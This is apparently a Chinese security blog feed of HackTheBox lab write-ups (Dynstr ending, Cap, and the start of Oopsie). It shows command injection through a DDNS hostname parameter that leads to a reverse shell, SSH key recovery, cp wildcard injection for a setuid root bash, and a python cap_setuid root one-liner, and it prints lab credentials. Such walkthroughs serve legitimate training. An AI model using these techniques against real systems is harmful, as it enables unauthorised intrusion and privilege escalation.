<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">GET /nic/update?hostname=mytest.example.com&amp;myip=192.0.2.25 HTTP/1.1</span><br><span class="line"></span><br><span class="line">Host: dynupdate.no-ip.com</span><br><span class="line"></span><br><span class="line">Authorization: Basic base64-encoded-auth-string</span><br><span class="line"></span><br><span class="line">User-Agent: Company DeviceName-Model/FirmwareVersionNumber maintainer-contact@example.com</span><br></pre></td></tr></table></figure>

<p>其中<strong>Authorization</strong>的解释如下：</p>
<blockquote>
<p><strong>Authorization:</strong> base64-encoded-auth-string should be the <a href="http://en.wikipedia.org/wiki/Base64">base64 encoding </a>of username:password.</p>
</blockquote>
<p><strong>Authorization</strong>为base64加密的<strong>username:password</strong>，似乎上述所有参数我们都已经有了</p>
<p>模仿示例直接用curl请求得到正确响应（当然可以用Burpsuite）</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/good%E5%9B%9E%E6%98%BE.png" alt="good回显"></p>
<p>在no-ip上找到了对各种相应的解释</p>
<table>
<thead>
<tr>
<th>Status</th>
<th>Description</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>good IP_ADDRESS</td>
<td>Success</td>
<td>DNS hostname update successful. Followed by a space and the IP address it was updated to.  The IP address returned will be the IPv4 address, if an IPv4 is supplied. If IPv4 and IPv6 are both supplied, both ips will be returned in a comma separated list. If only an IPv6 address is supplied, an IPv6 address (only) will be returned.</td>
</tr>
<tr>
<td>nochg IP_ADDRESS</td>
<td>Success</td>
<td>IP address is current, no update performed. Followed by a space and the IP address that it is currently set to.  The IP address returned will be the IPv4 address if an IPv4 is supplied. If IPv4 and IPv6 are both supplied, both ips will be returned in a comma separated list. If only an IPv6 address is supplied, an IPv6 address (only) will be returned.  Note: Excessive nochg responses may result in your client being blocked.</td>
</tr>
<tr>
<td>nohost</td>
<td>Error</td>
<td>Hostname supplied does not exist under specified account, client exit and require user to enter new login credentials before performing an additional request.</td>
</tr>
<tr>
<td>badauth</td>
<td>Error</td>
<td>Invalid username password combination.</td>
</tr>
<tr>
<td>badagent</td>
<td>Error</td>
<td>Client disabled. Client should exit and not perform any more updates without user intervention.  Note: You must use the recommended User-Agent format specified when <a href="https://www.noip.com/integrate/request">Submitting</a> an Update, failure to follow the format guidelines may result in your client being blocked.</td>
</tr>
<tr>
<td>!donator</td>
<td>Error</td>
<td>An update request was sent, including a feature that is not available to that particular user such as offline options.</td>
</tr>
<tr>
<td>abuse</td>
<td>Error</td>
<td>Username is blocked due to abuse. Either for not following our update specifications or disabled due to violation of the No-IP terms of service. Our terms of service can be viewed <a href="https://www.noip.com/legal/tos">here</a>. Client should stop sending updates.</td>
</tr>
<tr>
<td>911</td>
<td>Error</td>
<td>A fatal error on our side such as a database outage. Retry the update no sooner than 30 minutes.  A 500 HTTP error may also be returned in case of a fatal error on our system at which point you should also retry no sooner than 30 minutes.</td>
</tr>
</tbody></table>
<p>得到一个成功的响应，但对继续深入好像没有什么大的帮助</p>
<p>尝试对<code>myip</code>、<code>hostname</code>两个参数进行测试，输入<code>‘</code>、<code>；</code>、<code>：</code>等字符的时候报错了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/nsupdate%E6%8A%A5%E9%94%99.png" alt="nsupdate报错"></p>
<p>搜索<a href="https://linux.die.net/man/8/nsupdate">nsupdate</a>发现这是一个动态dns更新程序，既然报错了那么可以猜想Linux系统在执行这个程序时，传入了get到的几个参数，<code>hostname</code>传入一些错误输入会报错，那么这个参数传进去的内容也许可以利用一下(注意：这不是nsupdate本身报错)</p>
<h3 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h3><p>（一万年以后）</p>
<p>fuzz命令执行格式为``echo xxx|bash`，注意请求的时候还要进行一次url编码…</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">`echo [base64加密payload]| base64 -d | bash`</span><br></pre></td></tr></table></figure>

<p>nc收到nc收到弹回来的shell（这里可以升级一下shell）</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E5%BC%B9shell.png" alt="弹shell"></p>
<p>当前目录下发现了update的源码= =！！（这代码有问题，没问题也反弹不了shell…）</p>
<p><strong>update</strong></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  <span class="comment">// Check authentication</span></span><br><span class="line">  <span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;PHP_AUTH_USER&#x27;</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;PHP_AUTH_PW&#x27;</span>]))      &#123; <span class="keyword">echo</span> <span class="string">&quot;badauth\n&quot;</span>; <span class="keyword">exit</span>; &#125;</span><br><span class="line">  <span class="keyword">if</span> (<span class="variable">$_SERVER</span>[<span class="string">&#x27;PHP_AUTH_USER&#x27;</span>].<span class="string">&quot;:&quot;</span>.<span class="variable">$_SERVER</span>[<span class="string">&#x27;PHP_AUTH_PW&#x27;</span>]!==<span class="string">&#x27;dynadns:sndanyd&#x27;</span>) &#123; <span class="keyword">echo</span> <span class="string">&quot;badauth\n&quot;</span>; <span class="keyword">exit</span>; &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Set $myip from GET, defaulting to REMOTE_ADDR</span></span><br><span class="line">  <span class="variable">$myip</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>];</span><br><span class="line">  <span class="keyword">if</span> (<span class="variable">$valid</span>=filter_var(<span class="variable">$_GET</span>[<span class="string">&#x27;myip&#x27;</span>],FILTER_VALIDATE_IP))                       &#123; <span class="variable">$myip</span> = <span class="variable">$valid</span>; &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;hostname&#x27;</span>])) &#123;</span><br><span class="line">    <span class="comment">// Check for a valid domain</span></span><br><span class="line">    <span class="keyword">list</span>(<span class="variable">$h</span>,<span class="variable">$d</span>) = explode(<span class="string">&quot;.&quot;</span>,<span class="variable">$_GET</span>[<span class="string">&#x27;hostname&#x27;</span>],<span class="number">2</span>);</span><br><span class="line">    <span class="variable">$validds</span> = <span class="keyword">array</span>(<span class="string">&#x27;dnsalias.htb&#x27;</span>,<span class="string">&#x27;dynamicdns.htb&#x27;</span>,<span class="string">&#x27;no-ip.htb&#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span>(!in_array(<span class="variable">$d</span>,<span class="variable">$validds</span>)) &#123; <span class="keyword">echo</span> <span class="string">&quot;911 [wrngdom: <span class="subst">$d</span>]\n&quot;</span>; <span class="keyword">exit</span>; &#125;</span><br><span class="line">    <span class="comment">// Update DNS entry</span></span><br><span class="line">    <span class="variable">$cmd</span> = sprintf(<span class="string">&quot;server 127.0.0.1\nzone %s\nupdate delete %s.%s\nupdate add %s.%s 30 IN A %s\nsend\n&quot;</span>,<span class="variable">$d</span>,<span class="variable">$h</span>,<span class="variable">$d</span>,<span class="variable">$h</span>,<span class="variable">$d</span>,<span class="variable">$myip</span>);</span><br><span class="line">    system(<span class="string">&#x27;echo &quot;&#x27;</span>.<span class="variable">$cmd</span>.<span class="string">&#x27;&quot; | /usr/bin/nsupdate -t 1 -k /etc/bind/ddns.key&#x27;</span>,<span class="variable">$retval</span>);</span><br><span class="line">    <span class="comment">// Return good or 911</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="variable">$retval</span>) &#123;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&quot;good <span class="subst">$myip</span>\n&quot;</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="keyword">echo</span> <span class="string">&quot;911 [nsupdate failed]\n&quot;</span>; <span class="keyword">exit</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;nochg <span class="subst">$myip</span>\n&quot;</span>;</span><br><span class="line">  &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>通过<code>/etc/password</code>发现服务器上的用户有<strong>root</strong>、<strong>dyna</strong>、<strong>bindmgr</strong>，在<strong>bindmgr</strong>的目录下发现了user.txt但是没权限</p>
<p><strong>dyna</strong></p>
<p>![home dyna](<a href="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/home">https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/home</a> dyna.png)</p>
<p><strong>bindmgr</strong></p>
<p>![home bindmgr](<a href="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/home">https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/home</a> bindmgr.png)</p>
<p><strong>dyna</strong>目录下的 <code>.sudo_as_admin_successful</code>着实迷惑了我很久，做到后来发现确实没什么用，当然这是后话了</p>
<p>在<strong>bindmgr</strong>下还有个support-case-C62796521目录，读取其中的strace-C62796521.txt出来一堆东西，似乎是一个类似运行记录的文件，其中找到了<strong>bindmgr</strong>的ssh密钥</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/log%E6%96%87%E4%BB%B6.png" alt="log文件"></p>
<p>![get id_rsa](<a href="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/get">https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/get</a> id_rsa.png)</p>
<p>连不上！？</p>
<p>Google搜索：ddns ssh。其中<strong>Free Dynamic DNS for Remote Login via SSH</strong>启发了我，文中有段他说：选择一个域名添加当前的IP地址。那么我的ip应该不在靶机的dns域内，所以没法用ssh连接</p>
<p>找到了一篇<a href="https://www.thegeekstuff.com/2014/01/install-dns-server/">如何在linux中安装和配置DNS服务器</a>，所有 DNS 配置都存储在 /etc/bind 目录下。主要配置是 /etc/bind/named.conf，它将包含其他需要的文件。靶机上确实存在<code>/etc/bind</code>目录（update源码里也有写到），而且其中存在<code>.key</code>为后缀的文件，上面<strong>nsupdate</strong>的使用方法写到过</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">nsupdate [ -d ] [ [ -y keyname:secret ] [ -k keyfile ] ] [ -v ] [ filename ]</span><br><span class="line">-d 调试模式</span><br><span class="line">-k 从keyfile文件中读取密钥信息</span><br><span class="line">-y keyname是密钥的名称，secret是base64编码的密钥</span><br><span class="line">-v 使用TCP协议进行nsupdate，默认UDP协议</span><br></pre></td></tr></table></figure>

<p>keyfile就是指<code>.key</code>后缀的文件，那么思路清晰了，我们可以通过nsupdate来更新DNS区域</p>
<h3 id="什么是DNS区域"><a href="#什么是DNS区域" class="headerlink" title="什么是DNS区域"></a><a href="https://www.cloudflare.com/zh-cn/learning/dns/glossary/dns-zone/">什么是DNS区域</a></h3><blockquote>
<p>DNS 被分成许多不同的区域。这些区域区分 DNS 命名空间中不同管理的区域。 DNS 区域是由特定组织或管理员管理的 DNS 命名空间的一部分。 DNS 区域是一个管理空间，允许对 DNS 组件（例如权威名称服务器）进行更精细的控制。域名空间是一棵分层树，DNS 根域位于顶部。 DNS 区域从树中的一个域开始，也可以向下扩展到子域，以便一个实体可以管理多个子域。</p>
</blockquote>
<h2 id="GetShell"><a href="#GetShell" class="headerlink" title="GetShell"></a>GetShell</h2><p><strong>nsupdate的示例</strong></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">nsupdate示例:</span><br><span class="line">&gt; server 127.0.0.1 //发送请求到指定服务器，不指定就默认发给当当前去的主DNS服务器</span><br><span class="line">&gt; update delete www.test.com A //删除资源记录</span><br><span class="line">&gt;</span><br><span class="line">&gt; update add www.test.cn 80000 IN A 192.168.0.2 //添加一条资源记录</span><br><span class="line">&gt; update add 2.0.168.192.in-addr.arpa 80000 PTR A www.test.com</span><br><span class="line">&gt; send //一个空行或者一个send命令，会将先前输入的命令发送到DNS服务器上</span><br><span class="line">&gt; quit //退出</span><br></pre></td></tr></table></figure>



<p>利用上面<strong>update</strong>中使用的ddns.key，尝试添加记录的时候被拒绝了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/nsupdate1.png" alt="nsupdate1"></p>
<p>还有个infra.key，添加记录应该是成功了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/nsupdate2.png" alt="nsupdate2"></p>
<p>用SSH连接成功，得到user.txt</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/usertxt.png" alt="usertxt"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>sudo -l发现一个可执行文件<strong>bindmgr.sh</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/sudo-l.png" alt="sudo-l"></p>
<p>查看一下脚本是用来干嘛的</p>
<p><strong>bindmgr.sh</strong></p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="meta">#!/usr/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># This script generates named.conf.bindmgr to workaround the problem</span></span><br><span class="line"><span class="comment"># that bind/named can only include single files but no directories.</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># It creates a named.conf.bindmgr file in /etc/bind that can be included</span></span><br><span class="line"><span class="comment"># from named.conf.local (or others) and will include all files from the</span></span><br><span class="line"><span class="comment"># directory /etc/bin/named.bindmgr.</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># <span class="doctag">NOTE:</span> The script is work in progress. For now bind is not including</span></span><br><span class="line"><span class="comment">#       named.conf.bindmgr. </span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># <span class="doctag">TODO:</span> Currently the script is only adding files to the directory but</span></span><br><span class="line"><span class="comment">#       not deleting them. As we generate the list of files to be included</span></span><br><span class="line"><span class="comment">#       from the source directory they won&#x27;t be included anyway.</span></span><br><span class="line"></span><br><span class="line">BINDMGR_CONF=/etc/<span class="built_in">bind</span>/named.conf.bindmgr</span><br><span class="line">BINDMGR_DIR=/etc/<span class="built_in">bind</span>/named.bindmgr</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="title">indent</span></span>() &#123; sed <span class="string">&#x27;s/^/    /&#x27;</span>; &#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Check versioning (.version)</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;[+] Running <span class="variable">$0</span> to stage new configuration from <span class="variable">$PWD</span>.&quot;</span></span><br><span class="line"><span class="keyword">if</span> [[ ! -f .version ]] ; <span class="keyword">then</span></span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;[-] ERROR: Check versioning. Exiting.&quot;</span></span><br><span class="line">    <span class="built_in">exit</span> 42</span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"><span class="keyword">if</span> [[ <span class="string">&quot;`cat .version 2&gt;/dev/null`&quot;</span> -le <span class="string">&quot;`cat <span class="variable">$BINDMGR_DIR</span>/.version 2&gt;/dev/null`&quot;</span> ]] ; <span class="keyword">then</span></span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;[-] ERROR: Check versioning. Exiting.&quot;</span></span><br><span class="line">    <span class="built_in">exit</span> 43</span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Create config file that includes all files from named.bindmgr.</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;[+] Creating <span class="variable">$BINDMGR_CONF</span> file.&quot;</span></span><br><span class="line"><span class="built_in">printf</span> <span class="string">&#x27;// Automatically generated file. Do not modify manually.\n&#x27;</span> &gt; <span class="variable">$BINDMGR_CONF</span></span><br><span class="line"><span class="keyword">for</span> file <span class="keyword">in</span> * ; <span class="keyword">do</span></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&#x27;include &quot;/etc/bind/named.bindmgr/%s&quot;;\n&#x27;</span> <span class="string">&quot;<span class="variable">$file</span>&quot;</span> &gt;&gt; <span class="variable">$BINDMGR_CONF</span></span><br><span class="line"><span class="keyword">done</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Stage new version of configuration files.</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;[+] Staging files to <span class="variable">$BINDMGR_DIR</span>.&quot;</span></span><br><span class="line">cp .version * /etc/<span class="built_in">bind</span>/named.bindmgr/</span><br><span class="line"></span><br><span class="line"><span class="comment"># Check generated configuration with named-checkconf.</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;[+] Checking staged configuration.&quot;</span></span><br><span class="line">named-checkconf <span class="variable">$BINDMGR_CONF</span> &gt;/dev/null</span><br><span class="line"><span class="keyword">if</span> [[ $? -ne 0 ]] ; <span class="keyword">then</span></span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;[-] ERROR: The generated configuration is not valid. Please fix following errors: &quot;</span></span><br><span class="line">    named-checkconf <span class="variable">$BINDMGR_CONF</span> 2&gt;&amp;1 | indent</span><br><span class="line">    <span class="built_in">exit</span> 44</span><br><span class="line"><span class="keyword">else</span> </span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;[+] Configuration successfully staged.&quot;</span></span><br><span class="line">    <span class="comment"># *** TODO *** Uncomment restart once we are live.</span></span><br><span class="line">    <span class="comment"># systemctl restart bind9</span></span><br><span class="line">    <span class="keyword">if</span> [[ $? -ne 0 ]] ; <span class="keyword">then</span></span><br><span class="line">        <span class="built_in">echo</span> <span class="string">&quot;[-] Restart of bind9 via systemctl failed. Please check logfile: &quot;</span></span><br><span class="line">        systemctl status bind9</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="built_in">echo</span> <span class="string">&quot;[+] Restart of bind9 via systemctl succeeded.&quot;</span></span><br><span class="line">    <span class="keyword">fi</span></span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>分开来看这个脚本的功能</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> Check versioning (.version)<span class="built_in">echo</span> <span class="string">&quot;[+] Running <span class="variable">$0</span> to stage new configuration from <span class="variable">$PWD</span>.&quot;</span><span class="keyword">if</span> [[ ! -f .version ]] ; <span class="keyword">then</span>    <span class="built_in">echo</span> <span class="string">&quot;[-] ERROR: Check versioning. Exiting.&quot;</span>    <span class="built_in">exit</span> 42fiif [[ <span class="string">&quot;`cat .version 2&gt;/dev/null`&quot;</span> -le <span class="string">&quot;`cat <span class="variable">$BINDMGR_DIR</span>/.version 2&gt;/dev/null`&quot;</span> ]] ; <span class="keyword">then</span>    <span class="built_in">echo</span> <span class="string">&quot;[-] ERROR: Check versioning. Exiting.&quot;</span>    <span class="built_in">exit</span> 43fi</span></span><br></pre></td></tr></table></figure>

<p>检查版本，会检查<code>.version</code>文件是否存在，不存在则报错退出</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Create config file that includes all files from named.bindmgr.echo &quot;[+] Creating $BINDMGR_CONF file.&quot;printf &#x27;// Automatically generated file. Do not modify manually.\n&#x27; &gt; $BINDMGR_CONFfor file in * ; do    printf &#x27;include &quot;/etc/bind/named.bindmgr/%s&quot;;\n&#x27; &quot;$file&quot; &gt;&gt; $BINDMGR_CONFdone# Stage new version of configuration files.echo &quot;[+] Staging files to $BINDMGR_DIR.&quot;cp .version * /etc/bind/named.bindmgr/</span></span><br></pre></td></tr></table></figure>

<p>如果<code>.version</code>文件存在，则创建<code>$BINDMGR_CONF</code>文件，并把在.version同一目录下的所有文件都拷贝到<code>$BINDMGR_DIR</code>。（注意：cp命令用了通配符）</p>
<p>本地没有vim但是有nano，用nano创建一个<code>.version文件</code>随便输入什么版本并执行脚本，到<code>/etc/bind/named.bindmgr</code>目录发现<code>.version</code>文件确实被拷贝进来了而且为root所用拥有</p>
<p>![test sh](<a href="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/test">https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/test</a> sh.png)</p>
<p>![exec sh](<a href="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/exec">https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/exec</a> sh.png)</p>
<p>如果复制一个<code>bash</code>到<code>.version</code>同一目录，权限设置为setuid并运行脚本，bash被复制后为root所拥有，似乎就能获得root的shell了，尝试一下</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/sh%E5%89%8Dbash.png" alt="sh前bash"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/sh%E5%90%8Ebash.png" alt="sh后bash"></p>
<p>bash虽然被复制了但是s权限没有了，这个问题由于通配符的存在（bindmgr.sh）可以解决，可以参考一下这篇文章<a href="https://www.freebuf.com/articles/system/176255.html">利用通配符进行Linux本地提权</a></p>
<blockquote>
<p>当Shell在“参数值”中遇到了通配符时，Shell会将其当作路径或文件名去在磁盘上搜寻可能的匹配：若符合要求的匹配存在，则进行代换（路径扩展）；否则就将该通配符作为一个普通字符传递给“命令”，然后再由命令进行处理。总之，通配符实际上就是一种Shell实现的路径扩展功能。在通配符被处理后，Shell会先完成该命令的重组，然后再继续处理重组后的命令，直至执行该命令。</p>
</blockquote>
<p><code>cp --help</code>看看有没有能用来保留s权限的参数，-p参数</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/cp-p.png" alt="cp-p"></p>
<blockquote>
<p>-p：除复制文件的内容外，还把修改时间和访问权限也复制到新文件中。</p>
</blockquote>
<p>那么我们建一个<code>--preserve=mode</code>再运行脚本试试</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E4%BF%9D%E7%95%99mode.png" alt="保留mode"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/Sbash.png" alt="Sbash"></p>
<p>成功保留了s权限，可以得到root了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/getroot.png" alt="getroot"></p>
<p>end</p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>HackTheBox</tag>
      </tags>
  </entry>
  <entry>
    <title>HACKthebox-Cap</title>
    <url>/2022/01/07/HackTheBox-Cap/</url>
    <content><![CDATA[<h1 id="HackTheBox-Cap"><a href="#HackTheBox-Cap" class="headerlink" title="HackTheBox-Cap"></a>HackTheBox-Cap</h1><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/cap_pwn.png" alt="cap_pwn"></p>
<span id="more"></span>

<blockquote>
<p>本机IP：10.10.16.6</p>
<p>目标IP：10.10.10.245</p>
</blockquote>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p><strong>nmap</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/Cap_nmap.png" alt="nmap"></p>
<p>开放了21、22、80端口</p>
<p>常规操作访问一下网站看看干嘛的</p>
<p>这个网站挺有意思，起到了类似服务器仪表盘的作用，能看本地启动的服务、IP等等</p>
<p>在<code>Security Snapshot</code>里可以看到流量记录</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E6%B5%81%E9%87%8F.png" alt="流量"></p>
<p>本来下载流量包看了一下全是我自己访问的流量突然就没思路了</p>
<p>然后切到其他页面看了下功能又切回来以后发现URL有变化，<code>.../data/</code>斜杠后面的数字变了，试试看其他的数字都和上图一样，估计都是我的访问流量，当访问<code>.../data/0</code>的时候不一样了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E6%B5%81%E9%87%8F2.png" alt="流量2"></p>
<p>下载流量包，用<code>Wireshark</code>分析一下</p>
<p>找到了nathan用户的用户名密码</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/pcap.png" alt="pcap"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">USER： nathan     PASS Buck3tH4TF0RM3!</span><br></pre></td></tr></table></figure>

<p>上面提到服务器还开放了21、22端口，尝试用刚得到的用户名密码连接</p>
<p><strong>FTP</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/ftp.png" alt="ftp"></p>
<p>成功登录，发现了user.txt，下载下来得到user flag</p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p><strong>SSH</strong></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">ssh james@10.10.10.245</span><br></pre></td></tr></table></figure>

<p>成功连接</p>
<p>在提权上遇到了问题，首先Linux提权的姿势太多了，以前做的Linux靶机用的大多是<strong>sudo提权滥用</strong>，但是靶机中<code>nathan</code>用户没有使用sudo的权限，所以只能用其他的手段了。</p>
<p>本台靶机的名字叫cap，google上搜的时候也围绕这个点去找，发现在Linux常用命令里有<code>getcap</code>和<code>setcap</code>，接着发现了一篇很棒的文章（参考链接二），还有一个碉堡了的网站（参考链接三）</p>
<h3 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h3><p>从2.1版开始,Linux内核有了能力(capability)的概念,即它打破了UNIX/LINUX操作系统中超级用户/普通用户的概念,由普通用户也可以做只有超级用户可以完成的工作.</p>
<p><strong>Capabilities</strong>的主要思想在于分割root用户的特权，即将root的特权分割成不同的能力，每种能力代表一定的特权操作。例如：能力CAP_SYS_MODULE表示用户能够加载(或卸载)内核模块的特权操作，而<strong>CAP_SETUID表示用户能够修改进程用户身份的特权操作</strong>。在Capbilities中系统将根据进程拥有的能力来进行特权操作的访问控制</p>
<p>在Capilities中，只有进程和可执行文件才具有能力，每个进程拥有三组能力集，分别称为<code>cap_effective</code>, <code>cap_inheritable</code>, <code>cap_permitted</code>(分别简记为:pE,pI,pP)</p>
<p><strong>cap_permitted</strong>表示进程所拥有的最大能力集；</p>
<p><strong>cap_effective</strong>表示进程当前可用的能力集，可以看做是cap_permitted的一个子集；</p>
<p><strong>cap_inheitable</strong>则表示进程可以传递给其子进程的能力集。</p>
<p>系统根据进程的cap_effective能力集进行访问控制，cap_effective为cap_permitted的子集，进程可以通过取消cap_effective中的某些能力来放弃进程的一些特权。可执行文件也拥有三组能力集，对应于进程的三组能力集，分别称为cap_effective, cap_allowed 和 cap_forced（分别简记为fE,fI,fP），其中cap_allowed表示程序运行时可从原进程的cap_inheritable中集成的能力集，cap_forced表示运行文件时必须拥有才能完成其服务的能力集；而cap_effective则表示文件开始运行时可以使用的能力。</p>
<p>各种能力就不一一列举了，参考文章中写的很详细，本台靶机的提权用了<code>CAP_SETUID</code></p>
<blockquote>
<p>CAP_SETUID:允许改变进程的用户ID</p>
</blockquote>
<p>用<code>getcap</code>命令查看可执行文件获取的内核权限</p>
<blockquote>
<p>getcap [-v] [-r] [-h] [-n] <filename> [<filename> …]</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">getcap -r / 2&gt;/dev/null  #把错误输出到/dev/null</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/getcap.png" alt="getcap"></p>
<p>发现 python3.8 有<code>cap_setuid</code>，可以拿来利用提权了，提权方法在<a href="https://gtfobins.github.io/">GTFOBins</a>上找到的</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/gtfobins.png" alt="gtfobins"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python3 -c &#x27;import os;os.setuid(0);os.system(&quot;/bin/sh&quot;)&#x27; #python3.8或者python3都行</span><br></pre></td></tr></table></figure>



<p>拿到root权限</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/rootflag.png" alt="rootflag"></p>
<p>得到root flag</p>
<p>end</p>
<h2 id="写在最后"><a href="#写在最后" class="headerlink" title="写在最后"></a>写在最后</h2><p>Linux靶机的提权还是需要更多的学习和积累，虽然本台靶机整个流程很短，也没有什么网站上的漏洞利用直接就连上了，但还是有学到东西的。实际操作得来的经验比起光看博客和书本要印象更加深刻</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://cloud.tencent.com/developer/article/1544037?from=article.detail.1180355">https://cloud.tencent.com/developer/article/1544037?from=article.detail.1180355</a></p>
<p><a href="https://www.cnblogs.com/sky-heaven/p/12096758.html">https://www.cnblogs.com/sky-heaven/p/12096758.html</a></p>
<p><a href="https://gtfobins.github.io/gtfobins/python/">https://gtfobins.github.io/gtfobins/python/</a></p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>HackTheBox</tag>
      </tags>
  </entry>
  <entry>
    <title>HackTheBox-Oopsie</title>
    <url>/2022/01/07/HackTheBox-Oopsie/</url>
    <content><![CDATA[<h1 id="Hackthebox-Oopsie"><a href="#Hackthebox-Oopsie" class="headerlink" title="Hackthebox-Oopsie"></a>Hackthebox-Oopsie</h1><span id="more"></span>

<blockquote>
<p>目标IP：10.10.10.28</p>
<p>本机IP：10.10.16.38</p>
</blockquote>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a><strong>nmap</strong></h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/nmap-Oopsie.png" alt="nmap-Oopsie"></p>
<p>通过nmap信息搜集可以发现目标开放了22和80端口，既然开放了WEB服务，直接访问看看网站的功能和可能存在问题的点。</p>
